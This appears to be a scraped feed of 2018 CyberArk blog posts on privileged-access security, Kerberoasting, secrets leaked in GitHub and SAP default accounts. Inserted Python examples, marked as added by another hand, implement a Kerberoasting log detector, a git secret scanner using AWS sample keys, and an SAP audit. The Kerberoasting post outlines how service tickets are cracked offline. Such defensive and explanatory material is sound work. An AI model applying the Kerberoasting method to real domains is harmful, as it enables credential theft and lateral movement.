In the wizarding world, posting Dementors at the gates and hoping for the best simply isn’t enough. We can only hope that Hogwarts re-evaluated security in the post-Harry Potter era, considering the number of times Lord Voldemort and his cronies managed to break through the castle walls, sometimes even completely undetected. Cyber security is not magic. It takes strategy, planning and collaboration to reduce cyber security risk. Not only must we be able to recognize the attackers outside the organization, but we must also guard against overreaching access scope and keep seemingly innocent employees from becoming the attacker within. “Constant vigilance” includes protecting privileged access from the dark wizards of the cyber world. Contact us to learn more about how to protect your castle from the threat of dark cyber wizards.

2018 CyberArk Americas Partner Excellence Awards Announced at Impact https://www.cyberark.com/blog/2018-cyberark-americas-partner-excellence-awards-announced-impact/ Fri, 20 Jul 2018 20:15:38 +0000 https://www.cyberark.com/?p=26254/

This week we convened the largest gathering of privileged access security practitioners, technology partners and subject matter experts ever at CyberArk Impact Americas 2018.

Held in Boston, this 12th annual event underscores our “security is a team game” philosophy. The event provided an opportunity for customers to share their in-the-trenches experience and tech insights; spend one-on-one time with privileged access security experts addressing questions, challenges and unique approaches; and obtain hands-on product instruction and deep technical training. It’s also a venue to socialize with – and learn from – industry peers.

Regardless of where customers are in their privileged access security journey, there was something for everyone on the jam-packed agenda. Over the course of three days, attendees explored the future of security with CyberArk leaders; dissected recent attacks and advanced attack methodologies; discovered new defense strategies; and dug into technical demonstrations of CyberArk solutions and partner technologies.

The resounding theme across each session and demonstration was the critical need for strong cyber security hygiene and a systematic, risk-based approach to address organizations’ top control goals – from eliminating irreversible network takeover attacks to defending DevOps secrets in the cloud and on-premises.

CyberArk partners were also well represented at the conference. The Impact partner pavilion – featuring representatives from SailPoint, Okta, ForeScout, KPMG, PwC, CyberSheath, Deloitte, Clango, Optiv, Cognizant and SecureITSource – provided a hands-on opportunity for customers to experience some of the many technology partnerships and integrations requested by customers, made available through the CyberArk C3 Alliance Program and featured on the CyberArk Marketplace.

Our channel partners invest heavily in developing privileged access security expertise to help companies worldwide adopt best practices for their multi-layered cyber security programs. They espouse the benefits of taking both an attack and defend approach to security programs.

To recognize our partners’ valuable contributions, we were pleased to announce the 2018 recipients of the annual CyberArk Americas Partner Excellence Awards during the show. This year’s winners are:

All Americas

  • Partner of the Year Americas – Optiv
  • Global Systems Integrator of the Year Americas – PwC
  • Growth Systems Integrator Partner Americas – Deloitte

United States

  • New Business Leader U.S. – Sirius/Forsythe
  • Growth Reseller Partner U.S. – Accudata
  • Innovative Solution Partner U.S. – SecureITSource

Canada

  • New Business Leader Canada – Ion United
  • Partner of the Year Canada – The Herjavec Group

Latin America

  • Partner of the Year Brazil – EZ Security
  • Partner of the Year Mexico – ARAME
  • Partner of the Year CCA (Central America & the Caribbean) – SISAP
  • Partner of the Year NOLA (Colombia, Venezuela, Ecuador & Bolivia) – Nemesis
  • Partner of the Year SOLA (Argentina, Chile, Peru, Uruguay & Paraguay) – Novared

These awards celebrate top CyberArk channel, systems integrator and solution provider partners in the United States, Canada and Latin America. These partners have demonstrated strengths across a variety of categories including excellence in cyber security innovation, commitment to training and skills development, and driving customer success with market-leading privileged access security solutions to help defend against sophisticated attacks.

We congratulate all of this year’s winners and look forward to our continued collaboration to shape the future of our industry and protect what matters most.

For more information, read about the CyberArk Global Partner Program.

Strengthen and Simplify Container and DevOps Security with CyberArk Conjur Enterprise V5 https://www.cyberark.com/blog/strengthen-simplify-container-devops-security-cyberark-conjur-enterprise-v5/ Tue, 17 Jul 2018 12:40:21 +0000 https://www.cyberark.com/?p=26181/

Today we’re excited to announce CyberArk Conjur Enterprise V5 and also a new Vault Synchronizer as part of our commitment to strengthen and simplify security for DevOps and container environments. The V5 release adds new enterprise-class features and capabilities to the Conjur platform, which benefits security teams, operations and developers. For example, it is now easier for developers to migrate from Conjur Open Source to Conjur Enterprise. Conjur Enterprise now includes all of the integrations with container platforms and the CyberArk Vault offered earlier this year, as well as various performance improvements and enhancements.

New features in V5 include:

  • New capability to improve AWS workload security: CyberArk Conjur utilizes the native capabilities of AWS identity and access management (IAM) roles for strong authentication, while using Conjur for policy-based authorization. This enables developers and security teams to avoid re-work and any impact on velocity by allowing Conjur-defined policies to be applied to already defined AWS IAM roles. Conjur now authenticates any of the AWS principals, including AWS Elastic Compute Cloud (EC2), AWS Elastic Container Service (ECS) instances, AWS Auto Scaling and Lambda functions. This new capability is available for both Conjur Enterprise and Open Source, enabling organizations using AWS and CyberArk to more securely manage access policies across AWS, hybrid, multi-cloud and CI/CD pipelines.
  • Simplified transition from open source to enterprise: Conjur Enterprise V5 leverages all of the powerful features and integrations initially developed for Conjur Open Source.
  • New capabilities previously available only via Conjur Enterprise are now also available via Conjur Open Source. For example, the Kubernetes and Red Hat OpenShift integrations are available for both versions of Conjur.
  • Conjur Enterprise V5 also enhances various enterprise-class capabilities, including streamlined policy loading and policy management, improved master cluster performance and improved auditing features that use the industry-standard RFC 5424 syslog protocol.

Importantly, as we’ve made multiple updates and enhancements to Conjur Enterprise over the past few months, here is a brief recap of some of the integrations:

  • Strong container security: V5 includes all the recently offered integrations with leading container platforms – including Kubernetes, OpenShift, Pivotal Cloud Foundry and Cloud Foundry. Each integration takes advantage of the container platform’s native authentication capabilities and CyberArk’s robust security and policy capabilities. This makes it easier for developers to more securely deliver secrets and other credentials in any of the leading container environments.
  • Consistently managing secrets and credentials across the entire enterprise: Together with the new Synchronizer, the V5 release improves the performance and expands the integration with the CyberArk Enterprise Password Vault. The integrated solution automatically replicates secrets between the CyberArk vault, CyberArk Conjur and any container platform or native DevOps tool integrated with CyberArk Conjur. Now with the various integrations, enterprises can manage secrets in container platforms using the same policies already established in the CyberArk Vault and applied across the enterprise. Customers gain a simplified, consistent end-to-end secrets management solution that can extend to every compute and development platform, including native tools and container platforms integrated with Conjur.

Improvements in the latest release of Conjur Enterprise demonstrate CyberArk’s continued commitment and investment in the DevOps space with the enterprise-class capabilities of Conjur Enterprise, while making the Open Source version feature rich and easily accessible to developers. It was exciting to see all the interest from our customers at the DevOps sessions at CyberArk IMPACT in Europe, just last week, and now at the training sessions at IMPACT Americas. If you haven’t already, we encourage you to reach out to the Systems Engineer assigned to your organization to learn more about Conjur, encourage your developers to try Conjur Open Source, or reach out to sales to schedule a DevOps workshop or for more information.

Additional Resources

  • To learn more about CyberArk Conjur, visit: https://www.cyberark.com/conjur
  • To learn more about Conjur support for specific container platform and AWS integrations, visit: https://docs.conjur.org/
  • A new white paper is available “Securing DevOps Environments in the Enterprise with CyberArk Conjur” from com/Resources
  • You can also take a Conjur Open Source tutorial by registering here for the hosted demo. Everyone that registers also receives our new DevOps newsletter.


Cracking Service Account Passwords with Kerberoasting https://www.cyberark.com/blog/cracking-service-account-passwords-kerberoasting/ Mon, 16 Jul 2018 11:34:54 +0000 https://www.cyberark.com/?p=26166/

Threat detection is a hot topic in security today. By now, most recognize it’s important to manage administrative rights and take a centralized approach to security so as not to mismanage (or lose track of) older systems and applications. However, today there are new considerations. Kerberoasting has emerged as a way for attackers to exploit the Windows authentication protocol without needing access to an administrative account.

Kerberos’ legacy implementation in Active Directory is targeted as a key vulnerability by malicious actors. Kerberoasting in particular aims to crack the passwords of service accounts and can be effective by capitalizing on human nature: it is commonplace to create simple, easy-to-remember passwords, especially when they are shared. Keep in mind that the accounts used to launch this attack do not require admin rights; they simply have to be valid domain users.

When a privileged domain account is configured to run a service in the environment, such as MS SQL, a Service Principal Name (SPN) is registered in the domain to associate the service with that service account. However, it’s important to remember that many service accounts historically have too many administrative rights. Every least-privileged user who wants to use that specific resource receives a Kerberos service ticket encrypted with the NTLM hash of the privileged account that is running the service.

This inherently creates a vulnerability: a malicious actor can take the Kerberos ticket offline to his or her own machine and apply password-cracking methods such as brute force, rainbow tables, etc., until the correct service account password is discovered. From there, the attacker can use that service account’s cleartext password to move laterally throughout the entire network.

To identify these types of vulnerabilities, CyberArk Labs has built a tool called Zbang, which allows organizations to scan for and detect risks related to shadow admins, risky SPNs, SID histories, Skeleton Keys and delegation. Zbang helps organizations map out where these types of vulnerabilities exist. That information can then be digested by IT admins and onboarded into the CyberArk Privileged Access Security Solution, which is able to detect suspicious activity occurring with service accounts, as well as highlight and manage these risky SPNs — accounts that are at high risk for a Kerberoasting attack.
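As an added example (not CyberArk’s code and not part of the demo below), the following Python implements the kind of detection check a blue team can run over collected domain controller logs: it flags a single account that requests RC4-encrypted service tickets (encryption type 0x17, the type whose key is derived from the NTLM hash) for several distinct user-run service accounts within a short window, while ignoring machine accounts and krbtgt. Field names follow the Windows Security event 4769 schema; the records are constructed sample data and the thresholds are assumptions to tune per environment.

```python
"""Kerberoasting detection heuristic over Windows Security event 4769 records.

Added example (not CyberArk's code). Many successful RC4 (0x17) service-ticket
requests from one account for many distinct service accounts in a few minutes
is the log footprint of an SPN sweep; normal clients request tickets for the
handful of services they actually use, usually with AES (0x12/0x11).
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"                  # TicketEncryptionType value for RC4-HMAC
WINDOW = timedelta(minutes=5)      # assumed sliding window
MIN_DISTINCT_SERVICES = 3          # assumed threshold; tune per environment


def is_user_service_account(service_name: str) -> bool:
    """Machine accounts end in '$' and krbtgt is ordinary TGT traffic; skip both."""
    name = service_name.lower()
    return not name.endswith("$") and name != "krbtgt"


def detect_kerberoasting(events, window=WINDOW, min_services=MIN_DISTINCT_SERVICES):
    """Return one alert per (requesting user, source IP) whose RC4 ticket requests
    cover at least `min_services` distinct service accounts inside `window`."""
    by_requester = defaultdict(list)
    for ev in events:
        if ev["EventID"] != 4769 or ev["Status"] != "0x0":      # successful 4769 only
            continue
        if ev["TicketEncryptionType"] != RC4_HMAC:
            continue
        if not is_user_service_account(ev["ServiceName"]):
            continue
        by_requester[(ev["TargetUserName"], ev["IpAddress"])].append(ev)

    alerts = []
    for (user, ip), evs in by_requester.items():
        evs.sort(key=lambda e: e["TimeCreated"])
        best = set()        # largest set of distinct services seen in any window
        start = 0
        for end, ev in enumerate(evs):
            while ev["TimeCreated"] - evs[start]["TimeCreated"] > window:
                start += 1
            services = {e["ServiceName"] for e in evs[start:end + 1]}
            if len(services) > len(best):
                best = services
        if len(best) >= min_services:
            alerts.append({"user": user, "ip": ip,
                           "services": sorted(best), "rc4_requests": len(evs)})
    return alerts


def event(ts, user, service, enc_type, ip, status="0x0"):
    """Build a minimal 4769-style record (constructed sample data)."""
    return {"EventID": 4769, "TimeCreated": ts, "TargetUserName": user,
            "ServiceName": service, "TicketEncryptionType": enc_type,
            "IpAddress": ip, "Status": status}


T0 = datetime(2018, 7, 16, 9, 0, 0)
SAMPLE_EVENTS = [  # constructed; names and addresses are placeholders
    event(T0, "alice", "sqlsvc", "0x12", "10.0.0.11"),                       # AES: normal use
    event(T0 + timedelta(minutes=3), "carol", "legacyapp", "0x17", "10.0.0.12"),   # one RC4-only app
    event(T0 + timedelta(minutes=40), "carol", "legacyapp", "0x17", "10.0.0.12"),
    event(T0 + timedelta(minutes=10), "bob", "sqlsvc", "0x17", "10.0.0.25"),        # sweep begins
    event(T0 + timedelta(minutes=10, seconds=5), "bob", "SRV01$", "0x17", "10.0.0.25"),  # ignored
    event(T0 + timedelta(minutes=10, seconds=20), "bob", "websvc", "0x17", "10.0.0.25"),
    event(T0 + timedelta(minutes=10, seconds=45), "bob", "backupsvc", "0x17", "10.0.0.25"),
    event(T0 + timedelta(minutes=11), "bob", "iisapp", "0x17", "10.0.0.25"),
    event(T0 + timedelta(hours=2), "dave", "sqlsvc", "0x17", "10.0.0.30"),          # spread out:
    event(T0 + timedelta(hours=2, minutes=45), "dave", "websvc", "0x17", "10.0.0.30"),   # below
    event(T0 + timedelta(hours=3, minutes=30), "dave", "backupsvc", "0x17", "10.0.0.30"),  # threshold
]

if __name__ == "__main__":
    for alert in detect_kerberoasting(SAMPLE_EVENTS):
        print(f"possible Kerberoasting: {alert['user']} from {alert['ip']} "
              f"requested RC4 tickets for {alert['services']}")
```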

In the demo video below, we walk through a Red Team / Blue Team example of a real time Kerberoasting attack. The Red Team member uses John the Ripper, a frequently used open-source software, to crack a service account password and gain unauthorized access. The Blue Team member then leverages CyberArk Privileged Threat Analytics to detect this malicious behavior and stop the attack from causing irrevocable damage to the network.

Request a live demo to see CyberArk Privileged Threat Analytics in action. We’ll also demonstrate Kerberoasting during CyberArk Impact 2018 in Boston from July 16-18:

  • Deep Dive on Kerberoasting and Other Kerberos Attacks
  • More Zbang for the zBuck: How Zbang Can Be Used to Discover Hidden Risks

For more information about the Zbang tool, please reach out to your Account Team and they will be happy to provide further details and deliver the tool.

How to Address Vulnerabilities in Microsoft GitHub Repositories https://www.cyberark.com/blog/address-vulnerabilities-microsoft-github-repositories/ Fri, 13 Jul 2018 16:03:23 +0000 https://www.cyberark.com/?p=26159/

Microsoft’s acquisition of GitHub for $7.5 billion has raised questions about the future of GitHub’s privacy and security within the developer community. Some developers are already moving to other code version control platforms like GitLab. As Microsoft works to assuage these concerns, it’s a good time to review GitHub security concerns beyond Microsoft’s responsibility. Past breaches have proven that a private GitHub repository is not a secure place to keep sensitive and confidential information like secrets, i.e., passwords, API keys, SSH keys and certificates. These credentials equate to access to databases, cloud instances and privileged system control consoles that contain the crown jewels of an enterprise.

The Uber breach reported in November of 2017 is a high-profile example of secrets management gone wrong. Hackers stole the personal data of 57 million customers and drivers from Uber Technologies Inc. They were able to breach Uber’s private GitHub repository and find code with embedded secrets. With these secrets, the attackers were able to move laterally from Uber’s development environment to its production Amazon Web Services (AWS) account. This is the same AWS account that the company used to process live company data, so it contained a lot of sensitive client information.

Uber likely has sophisticated DevOps, yet the breach reported in 2017 was not the first time Uber was hacked via secrets in GitHub. In 2014, attackers leveraged mishandled secrets in GitHub to steal the personal data of 50,000 people. In the aftermath of the 2014 breach, the ridesharing company sued GitHub for information about any users who accessed the repo page with the exposed secrets.

Uber is not alone. In the fall of 2017, during a bug bounty program, Kevin Finisterre found private keys for the web domains of DJI – a Chinese drone manufacturer – and AWS S3 keys publicly available in GitHub. Using this data, an attacker could access drone flight log data and any images users uploaded to DJI, including photos of government IDs, driver’s licenses and passports. Some of the exposed flight log data was associated with government and military domains. Ironically, the self-proclaimed “most lethal bounty hunter in the galaxy” found the keys to the kingdom in a repo called “skypixel_lottery.” Finisterre said that DJI also left some of their AWS S3 buckets open to the public, a common security mistake. This is one way to let an attacker in, and weak secrets management then allows them to use privilege escalation and credential theft to advance the breach.

Many of the publicly announced breaches are at companies that should know a thing or two about DevOps security. So what’s going wrong? The shift from monolithic applications, static servers and long release cycles to the dynamic, fast-paced world of DevOps has drastically changed how software is developed and deployed. However, in the race to go to market first, many organizations have not properly evaluated how they think about DevOps security.

DevOps developers now have more control over security than ever before. In many organizations, developers can check code into repositories with little to no oversight from security teams. As we saw, this code could contain access keys to production systems, secrets embedded in a file, for example. Sometimes it’s as simple as accidentally checking your own GitHub key into the source code management system. Sometimes developers falsely believe deleting the offending code solves the problem, but the leaked secrets could remain in the repo history. Truffle Hog is an open source tool that searches git repositories for secrets by digging deep into commit histories and branches.
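The following Python is an added example, not Truffle Hog’s or CyberArk’s code. It scans every commit of a constructed in-memory history, combining a fixed-prefix pattern for AWS access key IDs with the Shannon-entropy heuristic that Truffle Hog popularised, and shows that a secret “removed” in the latest commit is still found in an earlier one. The key values are AWS’s published documentation samples, not live credentials; the thresholds, patterns and commit layout are assumptions.

```python
"""Secret scan over a repository's commit history (entropy + known-prefix patterns).

Added example, not Truffle Hog's code. The point it demonstrates: deleting a
leaked credential from the working tree does not remove it from history, so a
scanner must walk every commit. Commits below are constructed in memory.
"""
import math
import re
from collections import Counter

BASE64_CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
HEX_CHARS = "0123456789abcdefABCDEF"
MIN_TOKEN_LEN = 20
# (charset, entropy threshold in bits/char, label). Thresholds are assumptions
# in the spirit of Truffle Hog's defaults; tune them per repository.
ENTROPY_RULES = (
    (BASE64_CHARS, 4.5, "high_entropy_base64"),
    (HEX_CHARS, 3.0, "high_entropy_hex"),
)
# Credentials with a fixed format are cheaper to match directly (assumed, not exhaustive).
KEY_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "pem_private_key": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}


def shannon_entropy(data: str) -> float:
    """Bits of entropy per character: random base64 approaches 6, English words ~3-4."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def scan_text(text: str):
    """Return (line_number, kind, value) for every suspicious token in `text`."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in KEY_PATTERNS.items():
            for match in pattern.finditer(line):
                findings.append((lineno, kind, match.group(0)))
        for charset, threshold, kind in ENTROPY_RULES:
            # Candidate tokens are maximal runs of the charset, MIN_TOKEN_LEN or longer.
            token_re = "[" + re.escape(charset) + "]{%d,}" % MIN_TOKEN_LEN
            for token in re.findall(token_re, line):
                if shannon_entropy(token) > threshold:
                    findings.append((lineno, kind, token))
    return findings


def scan_history(commits):
    """Scan every file in every commit, not only the current tree."""
    results = []
    for commit in commits:
        for path, content in commit["files"].items():
            for lineno, kind, value in scan_text(content):
                results.append({"commit": commit["id"], "file": path,
                                "line": lineno, "kind": kind, "value": value})
    return results


# Constructed history: c2 checks in credentials, c3 "fixes" it by deleting the lines.
# Key values are AWS documentation samples (AKIAIOSFODNN7EXAMPLE / wJalr...EXAMPLEKEY).
SAMPLE_COMMITS = [
    {"id": "c1", "files": {"settings.py": "REGION = 'us-east-1'\nDEBUG = False\n"}},
    {"id": "c2", "files": {"settings.py":
        "REGION = 'us-east-1'\n"
        "AWS_ACCESS_KEY_ID = 'AKIAIOSFODNN7EXAMPLE'\n"
        "AWS_SECRET_ACCESS_KEY = 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY'\n"}},
    {"id": "c3", "files": {"settings.py":
        "REGION = 'us-east-1'\n# DoNotCommitCredentialsHere\n"}},
]

if __name__ == "__main__":
    head_findings = scan_text(SAMPLE_COMMITS[-1]["files"]["settings.py"])
    print("findings in HEAD only:", head_findings)          # nothing: the tree is clean
    for f in scan_history(SAMPLE_COMMITS):                  # history still holds both keys
        print(f"{f['commit']}:{f['file']}:{f['line']} {f['kind']} {f['value']}")
```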

No one should ever put secrets into GitHub or any other code repository; it doesn’t matter whether the repository is public or private, or whether the secrets are encrypted. Doing so increases your attack surface, as anyone who can view the code will have direct access to system or infrastructure credentials that they might not be authorized to have.

According to the Twelve-Factor App methodology, this is not only insecure, it is also bad application design, because it introduces code dependencies on access tokens that are subject to change. This means an organization’s developers will need to change their code and rebuild their applications every time a secret needs to be rotated. Securing your secrets with a centrally managed secrets provider such as CyberArk Conjur Open Source is a step in the right direction because it manages credential rotation and security for you. You can go further and remove API calls to your secrets provider from the code altogether with Summon, an open source command-line tool maintained by CyberArk. This holistic secrets management approach lets developers get out of the secrets management game while allowing security teams to provide security as a service.

If you are a developer or already have a secrets management solution you might want to check out open source Summon first. Summon allows you to replace any secret or API call to a secrets vault in your code with a simple environment variable. Summon will securely inject secrets into the process at runtime without exposing or leaking the credentials. This is not only more secure, but it also abstracts the application code from the secrets management tool, making it easy to swap out secrets providers.

It’s easy to get started. Check out the CyberArk Conjur Open Source hosted tutorial for a tour of core secrets management concepts, such as storing and fetching secrets, machine authentication and authorization and security policy as code.

If you get stuck or have any feedback on our open source tools, I would love to hear from you on Slack or reach out to me on Twitter @WalshSec.

Securing Privileged Access within Microsoft’s Enhanced Security Administrative Environments (ESAE) https://www.cyberark.com/blog/securing-privileged-access-within-microsofts-enhanced-security-administrative-environments-esae/ Tue, 03 Jul 2018 13:40:57 +0000 https://www.cyberark.com/?p=25764/

The Microsoft Enhanced Security Administrative Environment (ESAE) is a secured, bastion forest reference architecture designed to manage the Active Directory (AD) infrastructure. This methodology focuses on “Tier 0” assets and identities, which have direct or indirect administrative control over a given AD forest and all of the assets within it, such as domain controllers, domain administrator accounts, critical servers and workstations.

One popular technique in advanced cyber attacks is the exploitation of privileged accounts and their associated credentials to reach a Tier 0 domain controller – the central authority of trust within the Windows environment. Once a domain controller is compromised, the attacker has unrestricted access to the entire domain-joined IT infrastructure – all while eluding the visibility or awareness of the organization. Based on what CyberArk has seen in the field, it can take an attacker who has hijacked a privileged credential less than 12 minutes from initial infiltration to being able to take over a domain controller, which hosts the services that constitute AD.

Critical to the overall strength of an ESAE deployment is the hardening of the control relationships among these powerful credentials, assets and humans. But managing Tier 0 assets and protecting against credential theft is demanding and difficult, particularly because organizations often try to juggle multiple account management solutions from Microsoft, including Local Administrative Password Solution (LAPS) and Microsoft Identity Manager (MIM).

CyberArk has designed practical solutions for the administration of ESAE and has been deployed alongside the architecture to maximize security and eliminate pain points by reducing administrative overhead and decreasing total cost of ownership.

Learn how CyberArk can help secure privileged access, create credential boundaries and provide enhanced auditing and recording within the ESAE and production environments by downloading this solution brief.

Protecting Critical Business Systems: Five SAP Use Cases Protected by CyberArk https://www.cyberark.com/blog/protecting-critical-business-systems-five-sap-use-cases-protected-cyberark/ Fri, 29 Jun 2018 19:00:57 +0000 https://www.cyberark.com/?p=25739/

In November, we wrote a blog about the “7 types of privileged accounts you should know” to highlight potential privilege-related security risks. Today, we are spotlighting five powerful user accounts frequently found in SAP environments. These accounts are all created during the installation process when using SAP NetWeaver Application Server for ABAP and/or Java. The accounts can be centrally secured and managed by the CyberArk Privileged Access Security Solution.

  1. SAP*: Also known as SAP system super users, these accounts have sweeping access across SAP systems and are created in all clients immediately upon installation. These accounts need to be manually deactivated in all clients and added to a “SUPER” group, so that only authorized administrators can make changes. CyberArk helps to vault the related credentials in an encrypted repository, making sure that those authorized to make changes to this super group are indeed the only ones able to do so. If these credentials aren’t locked down, malicious actors can potentially achieve unlimited access to the data stored in the system.
  2. DDIC (Data Dictionary): DDIC users have special authorizations for installation, software logistics and the ABAP dictionary. The SAP installer sets the DDIC password to the master password chosen during installation. So that installations run smoothly, DDIC requires the SAP_ALL authorization during an installation or upgrade and is locked afterwards. To account for human error, the CyberArk Privileged Access Security Solution allows for automatic rotation of vaulted accounts and can change passwords immediately upon use, removing the manual process that would otherwise be required.
  3. EarlyWatch: EarlyWatch is an automatic service that monitors essential administrative areas of an SAP system and is most effective when activated for all SAP components in the stack. Because of the sweeping access these accounts require, it is crucial to detect, analyze and, when necessary, remediate attempts to access them, which CyberArk Privileged Threat Analytics can help with. These accounts also need to be provisioned in the SUPER group, so that only authorized users can change the passwords. With a central repository to manage and secure privileged credentials, SAP admins can dramatically reduce the risk of privileged credential compromise.
  4. SAPCPIC (Common Programming Interface for Communications): CPIC accounts are used for remote connections to legacy SAP systems (4.5 and older). These accounts are mostly used in Electronic Data Interchange (EDI) and have access to the S_A.CPIC profile. Malicious users can remotely execute Remote Function Calls (RFCs) or create dialog users with any privileges to enter the system and obtain unlimited amounts of information. These accounts can be deleted if they are not needed; if the account is required, additional steps must be taken, including changing the default password. In that case, access is granted only when required, and the related policies can be configured out of the box with the CyberArk Privileged Access Security Solution.
  5. TMSADM: During installation, a master password is set for the TMSADM user of the Transport Management System (TMS). This password is set automatically as a default and needs to be changed manually. SAP’s recommended best practice is to change the default password for TMSADM users, but this again requires manual attention that can be forgotten or bypassed. The CyberArk Privileged Access Security Solution can also be leveraged to vault these accounts, automatically create complex passwords and rotate them based on policy.
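The five accounts above each come with a concrete check (deactivated in every client, member of the SUPER group, installer password changed, locked outside an upgrade window, deleted if unused). The following script turns that list into an audit that can be run over an exported user list. It is an added example, not CyberArk’s or SAP’s code: the user records are constructed, and the field names (client, user, locked, default_password, group, profiles, in_use) are this example’s own model rather than any SAP table layout.

```python
"""Audit the SAP installer-created accounts for the controls listed above.

Added example, not CyberArk's or SAP's code. The user records are CONSTRUCTED
and the field names (client, user, locked, default_password, group, profiles,
in_use) are this example's own model, not an SAP table layout.
"""
from dataclasses import dataclass, field
from typing import List

SUPER_GROUP = "SUPER"
INSTALLER_ACCOUNTS = {"SAP*", "DDIC", "EARLYWATCH", "SAPCPIC", "TMSADM"}


@dataclass
class SapUser:
    client: str
    user: str
    locked: bool
    default_password: bool          # still the installer/master password
    group: str = ""
    profiles: List[str] = field(default_factory=list)
    in_use: bool = True             # constructed: a logon was seen in the audit window


def audit_user(u: SapUser) -> List[str]:
    """Return the hardening gaps for one record (empty list means compliant)."""
    name = u.user.upper()
    where = f"{name} (client {u.client})"
    gaps: List[str] = []
    if name not in INSTALLER_ACCOUNTS:
        return gaps                  # only the installer-created accounts are in scope
    # Common to all five: the password set at installation must be changed.
    if u.default_password:
        gaps.append(f"{where}: installer/master password still in use")
    if name == "SAP*":
        if not u.locked:
            gaps.append(f"{where}: active; deactivate SAP* in every client")
        if u.group != SUPER_GROUP:
            gaps.append(f"{where}: not in the {SUPER_GROUP} user group")
    elif name == "DDIC":
        # SAP_ALL is needed only during installation/upgrade; lock DDIC afterwards.
        if not u.locked:
            extra = " and holds SAP_ALL" if "SAP_ALL" in u.profiles else ""
            gaps.append(f"{where}: unlocked outside an installation/upgrade window{extra}")
    elif name == "EARLYWATCH":
        if u.group != SUPER_GROUP:
            gaps.append(f"{where}: not in the {SUPER_GROUP} user group")
    elif name == "SAPCPIC":
        if not u.in_use:
            gaps.append(f"{where}: unused legacy CPIC account; delete it")
    # TMSADM needs only the password change checked above.
    return gaps


def audit(users: List[SapUser]) -> List[str]:
    """Flatten the gaps for a whole user export."""
    return [gap for u in users for gap in audit_user(u)]


# Constructed sample: one system with clients 000 and 100.
SAMPLE_USERS = [
    SapUser("000", "SAP*", locked=False, default_password=True),
    SapUser("100", "SAP*", locked=True, default_password=False, group="SUPER"),
    SapUser("000", "DDIC", locked=False, default_password=False, group="SUPER",
            profiles=["SAP_ALL"]),
    SapUser("000", "EARLYWATCH", locked=True, default_password=True),
    SapUser("000", "SAPCPIC", locked=True, default_password=True, in_use=False),
    SapUser("000", "TMSADM", locked=False, default_password=False, group="SUPER"),
    SapUser("100", "JSMITH", locked=False, default_password=False),
]

if __name__ == "__main__":
    for gap in audit(SAMPLE_USERS):
        print(gap)
```

Each gap maps back to one item in the list; a vault that rotates these passwords on a schedule closes the "installer/master password still in use" class permanently, while the lock, group and delete checks remain periodic verifications of SAP-side configuration.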

Only CyberArk enables this level of comprehensive discovery, onboarding and management of privileged SAP accounts and credentials. For example, it’s a best practice to require the powerful users in SAP environments to verify their identities in order to access these accounts, and CyberArk can be used to validate and rotate credentials to ensure appropriate access. SAP has a set of security best practices specific to their applications and systems that organizations utilize, and with this certified integration, enterprises can be confident that this critical layer of security – privileged access security — is extended throughout the network.

Find additional information on the SAP Certified Apps Directory and the CyberArk Marketplace (search ‘SAP’ in the search field for all available integrations).

]]>
Brace for IMPACT with CyberArk Privileged Access Security Solution v10.4 https://www.cyberark.com/blog/brace-impact-cyberark-privileged-access-security-solution-v10-4/ Thu, 28 Jun 2018 20:45:36 +0000 https://www.cyberark.com/?p=25719/

CyberArk’s annual global Impact events are right around the corner. It’s THE place where attendees can connect with privileged access security experts to learn about industry trends, best practices and technology advances. We’ll be in Berlin next week and Boston mid-July.

In time for Impact 2018, we are excited to announce the availability of the CyberArk Privileged Access Security Solution v10.4. By dramatically simplifying and automating installation, enhancing how privileged risk is assessed and managed, and securing privileged access from endpoints to the cloud, organizations can quickly reduce cyber security risk across on-premises, cloud and hybrid environments.

Only CyberArk delivers the powerful combination of technical innovation, a great user experience and flexibility to scale across enterprise environments to mitigate the threat of compromised privileged credentials. New features and enhancements to the CyberArk Privileged Access Security Solution v10.4 give organizations the ability to:

  • Speed and simplify deployment on-premises and in the cloud: Customers now have the ability to deploy and configure our solution faster and easier than ever. The new CyberArk Privileged Access Security Installer delivers a 96 percent reduction in the steps required to deploy a typical on-premises customer implementation. The new Installer ensures that all prerequisites are met, and it hardens any components as needed. For customers with hybrid environments, CyberArk’s flexible and modular architecture enables rapid deployment of the CyberArk Privileged Access Security Solution on Microsoft Azure within approximately 10 minutes, utilizing Azure Resource Manager templates.
  • Advance risk-based privileged account on-boarding and session monitoring: With enhanced Privileged Threat Analytics capabilities, CyberArk delivers the most comprehensive solution for mitigating privilege-related risk with a combination of risk-based session suspension and account on-boarding. New functionality for security operations teams enables the review of risky sessions in real time, based on policy, preventing attacks involving the misuse of privileged credentials. New automated account creation enables security teams to directly on-board and preconfigure pending accounts and thwart the use of privileged backdoor accounts.
  • Reduce risk of lateral movement: CyberArk Endpoint Privilege Manager reduces the risk of lateral movement from Mac workstations with enhanced privilege management capabilities, allowing users to install applications and execute sudo commands, based on policy, without requiring admin level credentials. It also enables organizations to enforce least privilege across the enterprise, including the ability to rotate local admin credentials for Windows and Mac workstations both on and off corporate networks.

If you’d like to upgrade to the latest version of the CyberArk Privileged Access Security Solution, please reach out to your Account Management team or request a demo here!

]]>
CyberArk Conjur Added as a Key Security Element of the “Periodic Table of DevOps Tools” https://www.cyberark.com/blog/cyberark-conjur-added-key-security-element-periodic-table-devops-tools/ Wed, 27 Jun 2018 14:03:28 +0000 https://www.cyberark.com/?p=25702/

DevOps tools are being released at record pace, and keeping up with the latest – and most effective – can be challenging. The “Periodic Table of DevOps Tools” is an excellent go-to reference to help IT professionals navigate the expanding market. XebiaLabs published an updated version of the resource this week, and it spotlights CyberArk Conjur (element CK, number 118) as an integral security tool.

Available as an open source tool and for the enterprise, CyberArk Conjur is a secrets management solution tailored specifically for the evolving infrastructure requirements of native cloud and DevOps environments. The solution incorporates fundamental DevOps security principles, such as least privilege and segregation of duties, to secure and manage secrets used by non-human machine identities—from CI/CD tools to containers to applications to microservices—as well as human users throughout the DevOps pipeline.

